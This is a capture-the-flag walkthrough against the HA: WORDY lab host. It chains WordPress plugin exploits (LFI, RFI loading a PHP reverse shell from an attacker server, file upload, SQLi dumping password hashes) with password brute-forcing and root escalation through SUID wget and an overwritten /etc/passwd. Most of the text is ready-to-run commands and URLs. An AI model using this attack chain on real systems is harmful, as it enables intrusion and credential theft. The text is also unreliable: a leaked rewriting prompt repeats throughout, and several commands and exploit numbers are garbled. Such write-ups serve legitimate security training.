WordPress Asset Discovery
1.1. WordPress Host Discovery
This target range, **HA: WORDY[1]**, specifies the IP address and does not involve the host discovery process in WordPress.
1.2. WordPress Service Discovery
Using the command sudo -u root nmap 172.16.33.108 -n -Pn -p- --reason -sV -sC -O, the open ports, services provided, components used, and component versions of the host were discovered.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
/>
|
Open Ports |
Services Provided |
Components Used |
Component Versions |
|---|---|---|---|
|
80/tcp |
http |
Apache httpd |
2.4.29 |
|
– |
os |
Ubuntu Linux |
? |
Please provide the text you would like me to rewrite with the keyword “WordPress.”
2. Vulnerability Discovery (Privilege Escalation)
WordPress Port 80/HTTP Service Configuration
WordPress Component Vulnerabilities
0x01. Web Middleware
Using the command searchsploit Apache httpd 2.4., no Nday vulnerabilities were found for the Apache httpd 2.4.29 web middleware.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
/>
0x02. Web Framework
Using the browser plugin Wappalyzer, no web frameworks with Nday vulnerabilities were found.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
2.1.2. WordPress URL Vulnerabilities: RFI, File Upload
0x01. Direct Access
Opening http://172.16.33.108/ in a browser only displayed the web middleware’s default page.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
0x02. Directory Scanning (dirsearch)
Using the command dirsearch -u http://172.16.33.108/ -x 403 to scan the website’s directories and files and check them individually, only the /wordpress/wp-login.php file was valuable.
Using the command wpscan --url http://172.16.33.108/wordpress/ --enumerate u to scan WordPress users, the users admin and aarti were discovered.
Using the command wpscan --url http://172.16.33.108/wordpress/ --usernames admin,aarti --passwords /usr/share/wordlists/rockyou.txt to brute-force the passwords of these two users, 120,000 passwords were tested for each user over two hours without success.
Using the command wpscan --url http://172.16.33.108/wordpress/ to scan WordPress plugins, 7 plugins were found.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
01. mail-masta 1.0 Plugin (RFI)
Using the command searchsploit mail masta, two Nday vulnerabilities were found for the mail-masta 1.0 plugin: Local File Inclusion (LFI) and SQL injection (SQLi).
Using the command searchsploit -m 48290, the exploit for the LFI vulnerability was copied to the current directory. The command cat 40290.txt was used to view the vulnerable URL. The URL http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd was constructed and accessed in the browser, successfully retrieving the `/etc/passwd` file, confirming the existence of the LFI vulnerability.
Checking for an RFI vulnerability to gain shell access, the command cp /usr/share/webshells/php/php-reverse-shell.php ./ was used to copy the reverse webshell to the current directory. The command vim php-reverse-shell.php was used to modify the listening IP and port in the “CHANGE THIS” section. The command python3 -m http.server was used to set up a web server for the target machine to download the reverse webshell. The command nc -nvlp 33108 was used to listen for the reverse shell. The URL http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://10.8.0.110:8000/php-reverse-shell.php was constructed and accessed in the browser, successfully obtaining a shell with www-data user privileges, thus breaching the boundary.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Using the command searchsploit -m 41438, the exploit for the SQLi vulnerability was copied to the current directory. The command cat 41438.txt was used to view the details. There were four SQLi vulnerabilities, but the second to fourth required admin login, while the first did not. The URL http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php was constructed and accessed, resulting in an `export.csv` file, but it contained only the word “Email”.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
02. reflex-gallery 3.1.3 Plugin (File Upload)
Using the command searchsploit reflex gallery, one Nday vulnerability was found for the reflex-gallery 3.1.3 plugin: arbitrary file upload. Using the command searchsploit -m 36374, the exploit was copied to the current directory. The command cat 36374.txt was used to view the exploit details, which provided the file upload exploit page and the URL after the file upload.
After editing the file upload exploit page using vim 36374.html and setting up a web server with python3 -m http.server, accessing the file upload exploit page http://127.0.0.1:8000/36374.html and uploading the modified reverse webshell /usr/share/webshells/php/php-reverse-shell.php resulted in an error: {"error":"Directory does not exist and could not be created."}.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Analysis showed that the directory for uploading files did not exist and could not be created. Therefore, an existing directory was found. Two directories, 2019-09 and 2022-11, were found. After modifying the file upload exploit page, the reverse webshell was successfully uploaded.
After listening on the port using nc -nvlp 33108, accessing the reverse webshell URL http://172.16.33.108/wordpress/wp-content/uploads/2019/09/php-reverse-shell.php in the browser successfully granted www-data user privileges.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
03. site-editor 1.1.1 Plugin (LFI)
Using the command searchsploit WordPress site editor, one Nday vulnerability was found for the site-editor 1.1.1 plugin: Local File Inclusion (LFI). Using the command searchsploit -m 44340, the exploit was copied to the current directory. The command cat 44340.txt was used to obtain the vulnerable URL. The URL http://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd was constructed and accessed in the browser, successfully retrieving the `/etc/passwd` file, confirming the existence of the LFI vulnerability.
Checking for an RFI vulnerability to gain shell access, the command cp /usr/share/webshells/php/php-reverse-shell.php ./ was used to copy the reverse webshell to the current directory. The command vim php-reverse-shell.php was used to modify the listening IP and port in the “CHANGE THIS” section. The command python3 -m http.server was used to set up a web server for the target machine to download the reverse webshell. The command nc -nvlp 33108 was used to listen for the reverse shell. The URL http://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=http://10.8.0.110:8000/php-reverse-shell.php was constructed and accessed in the browser, resulting in an error: {"success":false,"message":"Error: didn't load shortcodes pattern file"}. It appears that a remote file inclusion vulnerability does not exist.
Further attempts to access other Linux files and execute commands were unsuccessful.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Heading: WordPress Slideshow-Gallery Plugin 1.4.6
Using the command searchsploit slideshow gallery 1.4.6, one Nday vulnerability was found for the slideshow-gallery 1.4.6 plugin: arbitrary file upload. Using the command searchsploit -m 34514, the exploit was copied to the current directory. The command cat 34514.txt was used to view the exploit details, which required admin privileges, so it was abandoned.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
05. wp-easycart-data Plugin
Using the command searchsploit easycart data, no Nday vulnerabilities were found for the wp-easycart-data plugin.
06. wp-support-plus-responsive-ticket-system 7.1.3 Plugin
Using the command searchsploit wp support plus responsive ticket system, two Nday vulnerabilities were found for the wp-support-plus-responsive-ticket-system 7.1.3 plugin: SQLi and privilege escalation.
Using the command searchsploit -m 40939, the exploit for the SQLi vulnerability was copied to the current directory. The command cat 40939.txt was used to view the exploit details, which required an admin account, so it was abandoned.
Using the command searchsploit -m 41006, the exploit for the privilege escalation vulnerability was copied to the current directory. The command cat 41006.txt was used to view the exploit details, which required an admin account, so it was abandoned.
07. wp-symposium 15.1 Plugin (SQLi)
Using the command searchsploit wp symposium 15.1, three Nday vulnerabilities were found for the wp-symposium 15.1 plugin, all SQLi.
Using the command cat 37080.txt to view the first exploit details, three payloads were tested, but the SQLi vulnerability was not found.
Using the command cat 37824.txt to view the second exploit details and constructing a vulnerability verification URL http://172.16.33.108/wordpress/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--, a successful response was obtained, confirming the vulnerability’s existence.
A POC `concat(user_login,char(58),user_pass) from wordpress.wp_users;–` was constructed and URL-encoded to read the WordPress user password, obtaining `admin:PBYWgfD7pa572QS9YFoeVVmhrIhBAx0.`. However, neither CMD5[2] nor SOMD5[3] could decrypt it. Since wpscan failed to crack the password after two hours of testing 120,000 passwords, creating a rainbow table was abandoned.
Attempts to reset the admin password failed because sqlmap identified the injection point as not supporting stacked injection, preventing the execution of the UPDATE statement.
Using the command cat 37822.txt to view the third exploit details and comparing the response of the constructed vulnerability verification payload with a normal request, both requests showed the same 21-second delay, indicating no time-based SQL injection.
0x02. Directory Scanning (dirb)
Using the command dirb http://172.16.33.108/ -X .txt,.zip to scan the website’s directories and files, two files were found. The `/notes.txt` file suggests paying attention to ZIP files, while the `secret.zip` file contains a `link.txt` file, requiring a password to extract. However, attempts to crack the password using `/usr/share/john/password.lst` and `/usr/share/wordlists/rockyou.txt` (totaling 14.34 million passwords) failed.
0x03. Fuzzing
Based on the current information, fuzzing the website’s directories and files is unnecessary.
0x04. Protocol Switching
Accessing https://172.16.33.108:80/ in the browser showed that the website was not using the SSL protocol.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
3. Privilege Escalation
Using the commands which python and which python3 to check which version of Python the target machine uses, Python3 was found. Using the command python3 -c 'import pty; pty.spawn("/bin/bash")', an interactive shell was obtained.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Please provide the text you would like me to rewrite with the keyword “WordPress.”
3.1. www-data User
3.1.1. sudo
Using the command sudo -l to view the commands that can be executed with other user’s privileges, it was found that the current user’s SSH password was needed. Since this password was unavailable, the attempt was abandoned.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Please provide the text you would like me to rewrite with the keyword “WordPress.”
3.1.2. SUID: wget, cp
Using the command find / -perm -u=s -type f -ls 2>/dev/null to check which commands are executed with the owner’s privileges, several commands were found.
Please provide the text you would like me to rewrite with the keyword “WordPress.”
Checking each command in GTFOBins[4] for privilege escalation possibilities, `/usr/bin/wget` was found to be exploitable. Executing `EXPTF=(mktemp)`, `chmod +x TF`, `echo -e ‘#!/bin/sh -p\n/bin/sh -p 1>&0’ >TF`, and `/usr/bin/wget –use-askpass=TF 0` resulted in obtaining root privileges, successfully completing privilege escalation.
It’s also possible to add a privileged user to `/etc/passwd` for privilege escalation. First, the command `cat /etc/passwd` was used on the target machine and the output copied locally.
Then, using the command openssl passwd -6 -salt salt 123456, an SSH password for “123456” was generated locally. Based on the `/etc/passwd` file from the target machine, a new `/etc/passwd` file was created using vim passwd, adding a privileged account `hacker` with password `123456`. A web server was then started with `python3 -m http.server` to allow the target machine to download the file.
Finally, the target machine downloaded the new `/etc/passwd` file using wget http://10.8.0.110:8000/passwd -O /etc/passwd, overwriting the old one. Using `su hacker` and the password `123456`, it was possible to switch to the root-privileged `hacker` user, successfully completing privilege escalation.
![]("https://www.ids-sax2.com/wp-content/uploads/picture/developer-qcloudimg-com-2cdafd53c25c0825570842b7cdd3)